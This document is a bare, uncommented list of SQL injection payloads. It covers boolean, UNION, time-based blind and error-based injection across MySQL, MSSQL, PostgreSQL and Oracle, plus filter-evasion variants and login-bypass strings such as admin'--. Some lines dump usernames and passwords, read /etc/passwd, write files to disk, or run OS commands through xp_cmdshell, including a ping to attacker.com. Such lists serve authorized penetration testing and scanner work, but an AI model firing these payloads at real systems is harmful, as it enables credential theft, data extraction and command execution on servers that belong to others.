' AND 1=1--
' AND 1=2--
' AND 'x'='x
' AND 'x'='y
' OR 1=1--
' OR 'x'='x
" AND 1=1--
" AND 1=2--
" OR 1=1--
') AND 1=1--
') OR 1=1--
')) AND 1=1--
')) OR 1=1--
1' AND 1=1--
1' AND 1=2--
1' ORDER BY 1--
1' ORDER BY 2--
1' ORDER BY 3--
1' ORDER BY 5--
1' ORDER BY 10--
1' ORDER BY 50--
1' ORDER BY 100--
1' UNION SELECT NULL--
1' UNION SELECT NULL,NULL--
1' UNION SELECT NULL,NULL,NULL--
1' UNION SELECT NULL,NULL,NULL,NULL--
1' UNION SELECT NULL,NULL,NULL,NULL,NULL--
1' UNION SELECT 1,2,3--
1' UNION SELECT 1,2,3,4--
1' UNION SELECT 1,2,3,4,5--
1' UNION ALL SELECT NULL--
1' UNION ALL SELECT NULL,NULL--
1' UNION ALL SELECT NULL,NULL,NULL--
' UNION SELECT username,password FROM users--
' UNION SELECT table_name,NULL FROM information_schema.tables--
' UNION SELECT column_name,NULL FROM information_schema.columns--
' UNION SELECT @@version,NULL--
' UNION SELECT version(),NULL--
' UNION SELECT user(),NULL--
' UNION SELECT database(),NULL--
' UNION SELECT current_user,NULL--
' AND SLEEP(5)--
' AND SLEEP(5)#
' OR SLEEP(5)--
' OR SLEEP(5)#
1' AND SLEEP(5)--
1' AND SLEEP(5)#
' AND BENCHMARK(10000000,SHA1('test'))--
' AND (SELECT * FROM (SELECT(SLEEP(5)))a)--
'; WAITFOR DELAY '0:0:5'--
'; WAITFOR DELAY '00:00:05'--
1; WAITFOR DELAY '0:0:5'--
' AND 1=(SELECT 1 FROM pg_sleep(5))--
'; SELECT pg_sleep(5)--
' || pg_sleep(5)--
'||pg_sleep(5)--
1' AND (SELECT 1 FROM (SELECT SLEEP(5))a)--
' RLIKE SLEEP(5)--
' AND EXP(~(SELECT * FROM (SELECT SLEEP(5))a))--
'; SELECT DBMS_LOCK.SLEEP(5) FROM dual--
' AND 1=DBMS_PIPE.RECEIVE_MESSAGE('a',5)--
' AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT version())))--
' AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT user())))--
' AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT database())))--
' AND UPDATEXML(1,CONCAT(0x7e,(SELECT version())),1)--
' AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(version(),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.tables GROUP BY x)a)--
' AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(user(),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.tables GROUP BY x)a)--
' AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(database(),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.tables GROUP BY x)a)--
' AND 1=CONVERT(int,(SELECT TOP 1 table_name FROM information_schema.tables))--
' AND 1=CONVERT(int,@@version)--
'; EXEC xp_cmdshell('whoami')--
'; EXEC xp_cmdshell('ping attacker.com')--
'; EXEC master..xp_cmdshell 'ping attacker.com'--
' INTO OUTFILE '/tmp/test.txt'--
' INTO DUMPFILE '/tmp/test.txt'--
' LOAD_FILE('/etc/passwd')--
'/**/OR/**/1=1--
'/**/AND/**/1=1--
'%20OR%201=1--
'%20AND%201=1--
'%09OR%091=1--
'/*!50000OR*/1=1--
'/*!50000AND*/1=1--
'%00OR 1=1--
'-1' OR '1'='1
'-1' AND '1'='1
'-1" OR "1"="1
'-1" AND "1"="1
0 OR 1=1
0' OR '1'='1
0" OR "1"="1
admin'--
admin')--
admin'))--
admin"--
admin")--
